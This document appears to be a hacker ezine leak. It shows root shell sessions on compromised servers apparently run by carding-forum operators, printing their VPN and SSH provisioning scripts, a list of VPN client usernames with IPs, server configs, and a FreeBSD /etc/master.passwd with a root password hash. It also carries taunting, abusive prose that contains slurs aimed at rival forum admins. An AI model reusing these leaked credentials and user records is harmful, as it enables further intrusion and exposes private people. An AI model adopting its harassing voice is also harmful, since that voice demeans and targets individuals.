-rw-r--r--  1 root root  3591 Nov 10 04:35 w333d21697_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Nov  6 03:41 w333d26767_OPENVPN.tgz
-rw-r--r--  1 root root  3586 Oct 22 01:09 w333d31139_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Sep 22 02:05 w333d4383_OPENVPN.tgz
-rw-r--r--  1 root root  3599 May 11  2010 w333d8639_OPENVPN.tgz
-rw-r--r--  1 root root  3579 Dec  4 09:33 w333d9676_OPENVPN.tgz
-rw-r--r--  1 root root  3620 Jun 11  2010 war10ck133710772_OPENVPN.tgz
-rw-r--r--  1 root root  3435 Aug 20 16:41 warmachine133724023_OPENVPN.tgz
-rw-r--r--  1 root root  3406 Sep  3 04:18 weedneger31561_OPENVPN.tgz
-rw-r--r--  1 root root  3418 Dec  5 08:42 weeman8818_OPENVPN.tgz
-rw-r--r--  1 root root  3433 Jun 16  2010 werther15618_OPENVPN.tgz
-rw-r--r--  1 root root  3591 Nov 23 19:41 winkel722094_OPENVPN.tgz
-rw-r--r--  1 root root  3600 Aug  3 16:02 winkelmann725337_OPENVPN.tgz
-rw-r--r--  1 root root  3585 Aug 15 16:31 woorm6760_OPENVPN.tgz
-rw-r--r--  1 root root  3603 Oct 23 04:28 wortermilk31260_OPENVPN.tgz
-rw-r--r--  1 root root  3597 Dec 13 19:34 wtfvpn2417141_OPENVPN.tgz
-rw-r--r--  1 root root  3419 Aug 27 04:03 ww2dd28375_OPENVPN.tgz
-rw-r--r--  1 root root  3580 Oct 15 16:33 x220x7914_OPENVPN.tgz
-rw-r--r--  1 root root  3567 Dec 16 07:03 xStream14196_OPENVPN.tgz
-rw-r--r--  1 root root  3572 Nov  9 01:51 xStream25123_OPENVPN.tgz
-rw-r--r--  1 root root  3569 Sep 30 15:38 xStream27135_OPENVPN.tgz
-rw-r--r--  1 root root  3425 Jul  8  2010 xStream9518_OPENVPN.tgz
-rw-r--r--  1 root root  3575 Aug 18 03:10 xStream9635_OPENVPN.tgz
-rw-r--r--  1 root root  3573 Sep 17 01:50 xeqtion7314_OPENVPN.tgz
-rw-r--r--  1 root root  3601 Nov 27 14:45 xx1337xx4652_OPENVPN.tgz
-rw-r--r--  1 root root  3608 Sep  9 21:16 xxkev200xx24744_OPENVPN.tgz
-rw-r--r--  1 root root  3412 Jul 17 07:25 zer00063_OPENVPN.tgz
-rw-r--r--  1 root root  3638 May 15  2010 zetinator10057_OPENVPN.tgz

# ls -la | grep -v tgz
total 2388
drwxr-xr-x  3 root root 36864 Jan  4 20:32 .
drwxr-xr-x 14 root root  4096 Feb  2  2010 ..
-rw-------  1 root root  1024 Jan  4 20:17 .rnd
-rw-r--r--  1 root root   387 Sep 17 00:14 addSSHuser.php
-rw-r--r--  1 root root   280 Sep 17 00:14 addVPNuser.php
-rwsr-sr-x  1 root root   700 May  9  2010 createSSHsocks.sh
-rwsr-sr-x  1 root root   518 May 11  2010 createVPN.sh
-rw-r--r--  1 root root     3 May 11  2010 index.htm
-rw-r--r--  1 root root     2 Sep 17 03:05 index.html
drwxr-xr-x  2 root root  4096 Sep 17 03:05 lighttpd
-rw-r--r--  1 root root 30730 Jan  7 19:07 sshCreateLog
-rw-r--r--  1 root root     4 Sep 16 23:51 test
-rw-r--r--  1 root root 22174 Jan  4 20:31 vpnCreateLog

# #Warning: dumb code ahead
# cat addSSHuser.php 
<?php
        if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>");
        // visudo www-data ALL=NOPASSWD: /var/www/createSSHsocks.sh

        if(isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['date']))
        {
                $user = $_GET['user'];
                $pass = $_GET['pass'];
                $date = $_GET['date'];

                echo shell_exec("sudo /var/www/createSSHsocks.sh $user $pass $date");   
        }

?>

# cat createSSHsocks.sh 
#!/bin/sh

if [ $# -lt 3 ]
then
        echo $0 user pass expDate
        exit
fi

if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$"
then
        echo "Invalid User"
        exit
fi
if ! echo $2 | grep -q -e "^[a-zA-Z0-9]*$"
then
        echo "Invalid Pass"
        exit
fi
if ! echo $3 | grep -q  -E "[0-9]{4}-[0-9]{2}-[0-9]{2}" 
then
        echo "Invalid ExpDate"
        exit
fi

user=$1
pass=$2
exp=$3

echo "`date`: $user $pass $date" >> sshCreateLog

if [ ! -d /home/SSHUSER ]
then
        echo "Creating /home/SSHUSER"
        mkdir /home/SSHUSER
fi

crpass=$(perl -e"`echo \"print crypt(\\\"$pass\\\", \\\"itsMySalt\\\")\"`")
deluser $user
useradd --home /home/SSHUSER --expiredate $exp --password $crpass --shell /usr/sbin/nologin $user

$ cat addVPNuser.php 
<?php
         if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>");
        // visudo www-data ALL=NOPASSWD: /var/www/createVPN.sh

        if(isset($_GET['user']))
        {
                $user = $_GET['user'];
                echo shell_exec("sudo /var/www/createVPN.sh $user 2> /dev/null");
        }

?>

# cat createVPN.sh 
#!/bin/sh

if [ $# -lt 1 ]
then
        echo $0 user
        exit
fi

if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$"
then
        echo "Invalid User"
        exit
fi

user=$1
dir=`pwd`

echo "`date`: $user" >> vpnCreateLog

cd /etc/openvpn/easy-rsa/2.0                         #MAD AES-1024 RIGHT HEEEERE
source ./vars >> /dev/null 2> /dev/null
./build-key --batch $user  >> /dev/null 2> /dev/null

fn=`echo "${user}${RANDOM}_OPENVPN.tgz"`

cd keys/
sed -e "s/_NAME_/$user/g" client.conf > ${user}_OVPN.ovpn
tar cfz $fn $user.crt $user.key ca.crt ${user}_OVPN.ovpn
mv $fn /var/www/
cd $dir
echo $fn

# cd /etc/openvpn/ && ls -la
total 48
drwxr-xr-x  4 root root  4096 Sep 17 03:20 .
drwxr-xr-x 70 root root  4096 Jan  7 19:07 ..
drwxr-xr-x  2 root root  4096 May  9  2010 certs
-rw-r--r--  1 root root  3427 May  9  2010 client.conf
drwxr-xr-x  4 root root  4096 May  9  2010 easy-rsa
-rw-------  1 root root  1187 Jan  7 21:44 ipp.txt
----------  1 root root   356 May 12  2010 openvpn-status.log
----------  1 root root   160 May 18  2010 openvpn.log
-rw-r--r--  1 root root 10388 Aug  9 23:09 server.conf
-rw-------  1 root root     0 May 18  2010 status.log
-rwxr-xr-x  1 root root  1352 Sep 18  2008 update-resolv-conf

# cat ipp.txt 
Dukeraider,10.8.0.4
WEEDtwo,10.8.0.8
elektro,10.8.0.12
21Kms,10.8.0.16
darkt0wn,10.8.0.20
hi,10.8.0.24
w333d,10.8.0.28
SleepyHollow,10.8.0.32
HonigMelone,10.8.0.36
SmileNike,10.8.0.40
becks,10.8.0.44
sunrise,10.8.0.48
papa42,10.8.0.52
malakas2,10.8.0.56
Fahne,10.8.0.60
freshestman,10.8.0.64
kobra,10.8.0.68
Thunder0,10.8.0.72
juden,10.8.0.76
b7231,10.8.0.80
mablutze,10.8.0.84
Kerber0s,10.8.0.88
Loader,10.8.0.92
latestnews,10.8.0.96
Sa1nt8564,10.8.0.100
SilverFox,10.8.0.104
nate23,10.8.0.108
pan1c,10.8.0.112
Ginal406,10.8.0.116
Mantis70,10.8.0.120
kstARRR,10.8.0.124
h3l0x,10.8.0.128
reideen,10.8.0.132
conviction,10.8.0.136
awesome,10.8.0.140
recoilcontrol,10.8.0.144
jack123,10.8.0.148
chiller1337,10.8.0.152
hung2304,10.8.0.156
Tiberius,10.8.0.160
Kolumbus,10.8.0.164
Delphinko,10.8.0.168
McKnad,10.8.0.172
Kamill,10.8.0.176
kevin4ual,10.8.0.180
SleepyHollow,10.8.0.184
N3v10,10.8.0.188
shore,10.8.0.192
kingpok,10.8.0.196
xStream,10.8.0.200
Kasanova,10.8.0.204
andreas7411,10.8.0.208
slic3menic3,10.8.0.212
FaxXer,10.8.0.216
Pitbull69,10.8.0.220
b1111,10.8.0.224
obama123,10.8.0.228
Alanka,10.8.0.232
oicw91,10.8.0.236
weeman,10.8.0.240
fuckdawn,10.8.0.244
docscanner,10.8.0.248

# cat server.conf 
#################################################
# Sample OpenVPN 2.0 config file for            #
# multi-client server.                          #
#                                               #
# This file is for the server side              #
# of a many-clients <-> one-server              #
# OpenVPN configuration.                        #
#                                               #
# OpenVPN also supports                         #
# single-machine <-> single-machine             #
# configurations (See the Examples page         #
# on the web site for more info).               #
#                                               #
# This config should work on Windows            #
# or Linux/BSD systems.  Remember on            #
# Windows to quote pathnames and use            #
# double backslashes, e.g.:                     #
# "C:\\Program Files\\OpenVPN\\config\\foo.key" #
#                                               #
# Comments are preceded with '#' or ';'         #
#################################################

# Which local IP address should OpenVPN
# listen on? (optional)
;local a.b.c.d

# Which TCP/UDP port should OpenVPN listen on?
# If you want to run multiple OpenVPN instances
# on the same machine, use a different port
# number for each one.  You will need to
# open up this port on your firewall.
port 1194

# TCP or UDP server?
;proto tcp
proto udp

# "dev tun" will create a routed IP tunnel,
# "dev tap" will create an ethernet tunnel.
# Use "dev tap0" if you are ethernet bridging
# and have precreated a tap0 virtual interface
# and bridged it with your ethernet interface.
# If you want to control access policies
# over the VPN, you must create firewall
# rules for the the TUN/TAP interface.
# On non-Windows systems, you can give
# an explicit unit number, such as tun0.
# On Windows, use "dev-node" for this.
# On most systems, the VPN will not function
# unless you partially or fully disable
# the firewall for the TUN/TAP interface.
;dev tap
dev tun

# Windows needs the TAP-Win32 adapter name
# from the Network Connections panel if you
# have more than one.  On XP SP2 or higher,
# you may need to selectively disable the
# Windows firewall for the TAP adapter.
# Non-Windows systems usually don't need this.
;dev-node MyTap

# SSL/TLS root certificate (ca), certificate
# (cert), and private key (key).  Each client
# and the server must have their own cert and
# key file.  The server and all clients will
# use the same ca file.
#
# See the "easy-rsa" directory for a series
# of scripts for generating RSA certificates
# and private keys.  Remember to use
# a unique Common Name for the server
# and each of the client certificates.
#
# Any X509 key management system can be used.
# OpenVPN can also use a PKCS #12 formatted key file
# (see "pkcs12" directive in man page).
ca certs/ca.crt
cert certs/server.crt
key certs/server.key  # This file should be kept secret

# Diffie hellman parameters.
# Generate your own with:
#   openssl dhparam -out dh1024.pem 1024
# Substitute 2048 for 1024 if you are using
# 2048 bit keys. 
dh certs/dh1024.pem

# Configure server mode and supply a VPN subnet
# for OpenVPN to draw client addresses from.
# The server will take 10.8.0.1 for itself,
# the rest will be made available to clients.
# Each client will be able to reach the server
# on 10.8.0.1. Comment this line out if you are
# ethernet bridging. See the man page for more info.
server 10.8.0.0 255.255.255.0

# Maintain a record of client <-> virtual IP address
# associations in this file.  If OpenVPN goes down or
# is restarted, reconnecting clients can be assigned
# the same virtual IP address from the pool that was
# previously assigned.
ifconfig-pool-persist ipp.txt

# Configure server mode for ethernet bridging.
# You must first use your OS's bridging capability
# to bridge the TAP interface with the ethernet
# NIC interface.  Then you must manually set the
# IP/netmask on the bridge interface, here we
# assume 10.8.0.4/255.255.255.0.  Finally we
# must set aside an IP range in this subnet
# (start=10.8.0.50 end=10.8.0.100) to allocate
# to connecting clients.  Leave this line commented
# out unless you are ethernet bridging.
;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100

# Configure server mode for ethernet bridging
# using a DHCP-proxy, where clients talk
# to the OpenVPN server-side DHCP server
# to receive their IP address allocation
# and DNS server addresses.  You must first use
# your OS's bridging capability to bridge the TAP
# interface with the ethernet NIC interface.
# Note: this mode only works on clients (such as
# Windows), where the client-side TAP adapter is
# bound to a DHCP client.
;server-bridge

# Push routes to the client to allow it
# to reach other private subnets behind
# the server.  Remember that these
# private subnets will also need
# to know to route the OpenVPN client
# address pool (10.8.0.0/255.255.255.0)
# back to the OpenVPN server.
;push "route 192.168.10.0 255.255.255.0"
;push "route 192.168.20.0 255.255.255.0"

# To assign specific IP addresses to specific
# clients or if a connecting client has a private
# subnet behind it that should also have VPN access,
# use the subdirectory "ccd" for client-specific
# configuration files (see man page for more info).

# EXAMPLE: Suppose the client
# having the certificate common name "Thelonious"
# also has a small subnet behind his connecting
# machine, such as 192.168.40.128/255.255.255.248.
# First, uncomment out these lines:
;client-config-dir ccd
;route 192.168.40.128 255.255.255.248
# Then create a file ccd/Thelonious with this line:
#   iroute 192.168.40.128 255.255.255.248
# This will allow Thelonious' private subnet to
# access the VPN.  This example will only work
# if you are routing, not bridging, i.e. you are
# using "dev tun" and "server" directives.

# EXAMPLE: Suppose you want to give
# Thelonious a fixed VPN IP address of 10.9.0.1.
# First uncomment out these lines:
;client-config-dir ccd
;route 10.9.0.0 255.255.255.252
# Then add this line to ccd/Thelonious:
#   ifconfig-push 10.9.0.1 10.9.0.2

# Suppose that you want to enable different
# firewall access policies for different groups
# of clients.  There are two methods:
# (1) Run multiple OpenVPN daemons, one for each
#     group, and firewall the TUN/TAP interface
#     for each group/daemon appropriately.
# (2) (Advanced) Create a script to dynamically
#     modify the firewall in response to access
#     from different clients.  See man
#     page for more info on learn-address script.
;learn-address ./script

# If enabled, this directive will configure
# all clients to redirect their default
# network gateway through the VPN, causing
# all IP traffic such as web browsing and
# and DNS lookups to go through the VPN
# (The OpenVPN server machine may need to NAT
# or bridge the TUN/TAP interface to the internet
# in order for this to work properly).
push "redirect-gateway def1"
push "dhcp-option DNS 92.241.168.201"

# Certain Windows-specific network settings
# can be pushed to clients, such as DNS
# or WINS server addresses.  CAVEAT:
# http://openvpn.net/faq.html#dhcpcaveats
# The addresses below refer to the public
# DNS servers provided by opendns.com.
;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"

# Uncomment this directive to allow different
# clients to be able to "see" each other.
# By default, clients will only see the server.
# To force clients to only see the server, you
# will also need to appropriately firewall the
# server's TUN/TAP interface.
;client-to-client

# Uncomment this directive if multiple clients
# might connect with the same certificate/key
# files or common names.  This is recommended
# only for testing purposes.  For production use,
# each client should have its own certificate/key
# pair.
#
# IF YOU HAVE NOT GENERATED INDIVIDUAL
# CERTIFICATE/KEY PAIRS FOR EACH CLIENT,
# EACH HAVING ITS OWN UNIQUE "COMMON NAME",
# UNCOMMENT THIS LINE OUT.
;duplicate-cn

# The keepalive directive causes ping-like
# messages to be sent back and forth over
# the link so that each side knows when
# the other side has gone down.
# Ping every 10 seconds, assume that remote
# peer is down if no ping received during
# a 120 second time period.
keepalive 10 120

# For extra security beyond that provided
# by SSL/TLS, create an "HMAC firewall"
# to help block DoS attacks and UDP port flooding.
#
# Generate with:
#   openvpn --genkey --secret ta.key
#
# The server and each client must have
# a copy of this key.
# The second parameter should be '0'
# on the server and '1' on the clients.
;tls-auth ta.key 0 # This file is secret

# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC        # Blowfish (default)
;cipher AES-128-CBC   # AES
;cipher DES-EDE3-CBC  # Triple-DES

# Enable compression on the VPN link.
# If you enable it here, you must also
# enable it in the client config file.
comp-lzo

# The maximum number of concurrently connected
# clients we want to allow.
;max-clients 100

# It's a good idea to reduce the OpenVPN
# daemon's privileges after initialization.
#
# You can uncomment this out on
# non-Windows systems.
;user nobody
;group nogroup

# The persist options will try to avoid
# accessing certain resources on restart
# that may no longer be accessible because
# of the privilege downgrade.
persist-key
persist-tun

# Output a short status file showing
# current connections, truncated
# and rewritten every minute.
status /dev/null 
#status.log 

# By default, log messages will go to the syslog (or
# on Windows, if running as a service, they will go to
# the "\Program Files\OpenVPN\log" directory).
# Use log or log-append to override this default.
# "log" will truncate the log file on OpenVPN startup,
# while "log-append" will append to it.  Use one
# or the other (but not both).
log      /dev/null
;log-append  openvpn.log

# Set the appropriate level of log
# file verbosity.
#
# 0 is silent, except for fatal errors
# 4 is reasonable for general usage
# 5 and 6 can help to debug connection problems
# 9 is extremely verbose
verb 0

# Silence repeating messages.  At most 20
# sequential messages of the same message
# category will be output to the log.
;mute 20

crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem

$ cat /etc/sockd.conf 
# $Id: sockd.conf,v 1.49 2009/10/27 11:56:55 karls Exp $
#
# A sample sockd.conf
#
#
# The configfile is divided into three parts;
#    1) serversettings
#    2) rules
#    3) routes
#
# The recommended order is:
#   Serversettings:
#               logoutput
#               internal
#               external
#               method
#               clientmethod
#               users
#               compatibility
#               extension
#               timeout
#               srchost
#
#  Rules:
#        client block/pass
#                from to
#                libwrap
#                log
#
#     block/pass
#                from to
#                method
#                command
#                libwrap
#                log
#                protocol
#                proxyprotocol
#
#  Routes:

# the server will log both via syslog, to stdout and to /var/log/lotsoflogs
#logoutput: syslog stdout /var/log/lotsoflogs
logoutput: /dev/null

# The server will bind to the address 10.1.1.1, port 1080 and will only
# accept connections going to that address.
internal: 92.241.190.253 port = 14421
# Alternatively, the interface name can be used instead of the address.
#internal: eth0 port = 1080

# all outgoing connections from the server will use the IP address
# 195.168.1.1
external: 92.241.190.253 

# list over acceptable methods, order of preference.
# A method not set here will never be selected.
#
# If the method field is not set in a rule, the global
# method is filled in for that rule.
#

# methods for socks-rules.
method: username 
#none #rfc931

# methods for client-rules.
#clientmethod: none

#or if you want to allow rfc931 (ident) too
#method: username rfc931 none

#or for PAM authentification
#method: pam

#
# User identities, an important section.
#

# when doing something that can require privilege, it will use the
# userid "sockd".
#user.privileged: sockd

# when running as usual, it will use the unprivileged userid of "sockd".
#user.unprivileged: sockd

# If you compiled with libwrap support, what userid should it use
# when executing your libwrap commands?  "libwrap".
#user.libwrap: libwrap


#
# Some options to help clients with compatibility:
#

# when a client connection comes in the socksserver will try to use
# the same port as the client is using, when the socksserver
# goes out on the clients behalf (external: IP address).
# If this option is set, Dante will try to do it for reserved ports aswell.
# This will usually require user.privileged to be set to "root".
#compatibility: sameport

# If you are using the bind extension and have trouble running servers
# via the server, you might try setting this.  The consequences of it
# are unknown.
#compatibility: reuseaddr

#
# The Dante server supports some extensions to the socks protocol.
# These require that the socks client implements the same extension and
# can be enabled using the "extension" keyword.
#
# enable the bind extension.
#extension: bind


#
# Misc options.
#

# how many seconds can pass from when a client connects til it has
# sent us it's request?  Adjust according to your network performance
# and methods supported.
#timeout.negotiate: 30   # on a lan, this should be enough.

# how many seconds can the client and it's peer idle without sending
# any data before we dump it?  Unless you disable tcp keep-alive for
# some reason, it's probably best to set this to 0, which is
# "forever".
timeout.io: 0 # or perhaps 86400, for a day.

# do you want to accept connections from addresses without
# dns info?  what about addresses having a mismatch in dnsinfo?
#srchost: nounknown nomismatch

#
# The actual rules.  There are two kinds and they work at different levels.
#
# The rules prefixed with "client" are checked first and say who is allowed
# and who is not allowed to speak/connect to the server.  I.e the
# ip range containing possibly valid clients.
# It is especially important that these only use IP addresses, not hostnames,
# for security reasons.
#
# The rules that do not have a "client" prefix are checked later, when the
# client has sent its request and are used to evaluate the actual
# request.
#
# The "to:" in the "client" context gives the address the connection
# is accepted on, i.e the address the socksserver is listening on, or
# just "0.0.0.0/0" for any address the server is listening on.
#
# The "to:" in the non-"client" context gives the destination of the clients
# socksrequest.
#
# "from:" is the source address in both contexts.
#


#
# The "client" rules.  All our clients come from the net 10.0.0.0/8.
#

# Allow our clients, also provides an example of the port range command.
client pass {
        from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0
        #method: rfc931 # match all idented users that also are in passwordfile
}

# This is identical to above, but allows clients without a rfc931 (ident)
# too.  In practise this means the socksserver will try to get a rfc931
# reply first (the above rule), if that fails, it tries this rule.
#client pass {
#        from: 10.0.0.0/8 port 1-65535 to: 0.0.0.0/0
#}


# drop everyone else as soon as we can and log the connect, they are not
# on our net and have no business connecting to us.  This is the default
# but if you give the rule yourself, you can specify details.
#client block {
#        from: 0.0.0.0/0 to: 0.0.0.0/0
#        log: connect error
#}


# the rules controlling what clients are allowed what requests
#

# you probably don't want people connecting to loopback addresses,
# who knows what could happen then.
#block {
#        from: 0.0.0.0/0 to: lo0
#        log: connect error
#}

# the people at the 172.16.0.0/12 are bad, no one should talk to them.
# log the connect request and also provide an example on how to
# interact with libwrap.
#block {
#        from: 0.0.0.0/0 to: 172.16.0.0/12
#        libwrap: spawn finger @%a
#        log: connect error
#}

# unless you need it, you could block any bind requests.
#block {
#        from: 0.0.0.0/0 to: 0.0.0.0/0
#        command: bind
#        log: connect error
#}

# or you might want to allow it, for instance "active" ftp uses it.
# Note that a "bindreply" command must also be allowed, it
# should usually by from "0.0.0.0/0", i.e if a client of yours
# has permission to bind, it will also have permission to accept
# the reply from anywhere.
pass {
        from: 0.0.0.0/0 to: 0.0.0.0/0
#        command: bind
#        log: connect error
}

# some connections expect some sort of "reply", this might be
# the reply to a bind request or it may be the reply to a
# udppacket, since udp is packetbased.
# Note that nothing is done to verify that it's a "genuine" reply,
# that is in general not possible anyway.  The below will allow
# all "replies" in to your clients at the 10.0.0.0/8 net.
#pass {
#        from: 0.0.0.0/0 to: 10.0.0.0/8
#        command: bindreply udpreply
#        log: connect error
#}


# pass any http connects to the example.com domain if they
# authenticate with username.
# This matches "example.com" itself and everything ending in ".example.com".
#pass {
#        from: 10.0.0.0/8 to: .example.com port = http
#        log: connect error
#        method: username
#}


# block any other http connects to the example.com domain.
#block {
#        from: 0.0.0.0/0 to: .example.com port = http
#        log: connect error
#}

# everyone from our internal network, 10.0.0.0/8 is allowed to use
# tcp and udp for everything else.
#pass {
#        from: 10.0.0.0/8 to: 0.0.0.0/0
#        protocol: tcp udp
#}

# last line, block everyone else.  This is the default but if you provide
# one  yourself you can specify your own logging/actions
#block {
#        from: 0.0.0.0/0 to: 0.0.0.0/0
#        log: connect error
#}

# route all http connects via an upstream socks server, aka "server-chaining".
#route {
# from: 10.0.0.0/8 to: 0.0.0.0/0 port = http via: socks.example.net port = socks
#}


All in all this really shouldn't surprise anyone. Carders.cc was  told
to fuck off twice now and we're  tired  of  cleaning  their  shit  up.
Seriously, it's not a secret that carders.cc's team members are a  bit
dim, though even they should have got the hint by now. Why  don't  you
go out, steal some handbags or whatever scum does at your age? This is
not only a warning to you but also to your users; don't put your trust
in admins that are that fucking incapable, because if you do, you will
be owned and your data will be exp0sed. - AGAIN -

        ,;~;,
           /\_
          (  /
          (()      //)
          | \\  ,,;;'\
      __ _(  )m=((((((((((((((========{  Undercover.su  }======-------
    /'  ' '()/~' '.(, |       
 ,;(      )||     |  ~ k!LLu, well, what can be said  about  him? He's
,;' \    /-(.;,   )  probably the  most attention-whoring  and at  the
     ) /       ) /   same time the most hated  kid around.  He  spends
    //         ||   his  time  lurking around on kiddyboards, bragging
   )_\         )_\  about his imaginary  achievements  and  skills. He
changes his nickname more frequently than his  underwear  but  usually
gets uncovered instantly due to his obtrusive arrogance and stupidity.
All in all he is hands-down the  most  annoying  little  brat  around.
Clearly, this self-proclaimed hosting-pro and his most recent  strokes
of genius "Secure-Host",  "Undercover.su" and  "Snap Reloaded" have to
be dealt with. k!LLu aka s1mpl3x aka purplera1n gave his best to  make
his board ("application only") look more private and exclusive than  a
dinner with the president. Probably this is why even  Fukushima  looks
crowded compared to undercover.su. But what can we say? He begged  for
it so we owned him anyway;  in fact we're presenting you  all  of  his
"projects" torn to pieces.                                            
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|   k!LLu: erstens                                                   |
|   k!LLu: entscheide ich ob es ein board gibt oder nich             |
|____________________________________________________________________|
                                                                      
k!LLu decides if a messageboard exists or not!  It's  no  secret  that
he is a  bit delusional  and tends to get stuff  mixed up. But,  admit
it, his ramblings are kind of fun to  read  and  we  look  forward  to
seeing what he comes up with to explain him being owned and exposed.  
 ___________________________________________________________________ _
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|   k!LLu: profis ????                                               |
|          LOOOOOOOOOL                                               |
|                                                                    |
|          1337Crew, Public lücke in der SB                          |
|          Carders, Public lücke im SMF                              |
|          Carders #2 , [0-day]24.12.2010 vbulletin 4.0p1Exploit     |
|                                                                    |
|          scriptkiddys.... nothing serverside...                    |
|                                                                    |
|          wäre ich früher aufgestanden hätte dort undercover        |
|          gestanden :/                                              |
|                                                                    |
|          Die Admins sind einfach zu daemlich....                   |
|          Crimenetwork -- MostHated&Unhacked                        |
|____________________________________________________________________|
                                                                      
k!LLu basically says that 1337crew and  carders.cc  were  hacked  with
public exploits by amateurs. He would  have  done  it  himself  if  he
hadn't slept so long.                                                 
                                                                      
The main question here is whether he himself believes  this  bullshit.
But seriously, he can't be that dumb. Crimenetwork, the predecessor of
undercover.su, was destined to fail from the beginning since k!LLu has
always been trying to create the image of the knowledgeable hacker and
admin he clearly is not. To promote his projects he apparently doesn't
back off from talking about public vulnerabilities that never  existed
or exploits he'd never get his hands on. It must be really  depressing
to have never even seen or possesed  a  0day  when  one  is  immensely
desperate to make others believe so. The sad thing  actually  is  that
his constant lying is believed by people incapable of checking  simple
facts. But just imagine this poor little  guy  trying  to  insult  the
hackers who are just watching him typing  it,  failing  to  understand
that he is just one of many Trumans in our show.  We  hope  that  this
ezine can once and for all depict k!LLu as the cocky kid he is.       
                                                                      
When trying not to puke while surfing Undercover.su we  stumbled  upon
some rumors. One of which stated that we  are  Global  Evolution  -  a
private little German fag community  that  tries  to explain  security
vulnerabilities by blogging videos  about  XSS. No  we're  not  Global
Evolution. If anything, we are evolution. We lend a  hand  to  natural
selection, by helping to wipe out the weak ones.  And,  believe  us or
not, k!LLu and his projects deserve to be wiped out more than  anybody
or anything else. We keep the show going ...

# uname -a
FreeBSD 8.2-RELEASE-p3 #4: Thu Sep 29 14:54:55 MSD 2011

# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

# cat /etc/passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
ucsu:*:1002:1002:User &:/home/ucsu:/usr/local/bin/bash
true:*:1003:1003:User &:/home/true:/sbin/nologin
symb:*:1006:1006:User &:/home/symb:/bin/sh
hosting:*:1008:1008:User &:/home/hosting:/sbin/nologin
gtbros:*:1001:1001:User &:/home/gtbros:/sbin/nologin
relite:*:1007:1007:User &:/home/relite:/bin/sh
wayne:*:1004:1004:User &:/home/wayne:/sbin/nologin
ixde:*:1009:1009:User &:/home/ixde:/sbin/nologin
backspace:*:1005:1005:User &:/home/backspace:/bin/sh
lcf:*:1000:1000:User &:/home/lcf:/bin/sh

# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
#
root:$1$bqzBFX0T$LkqVd6ktOTUX0qtY3W8fA1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
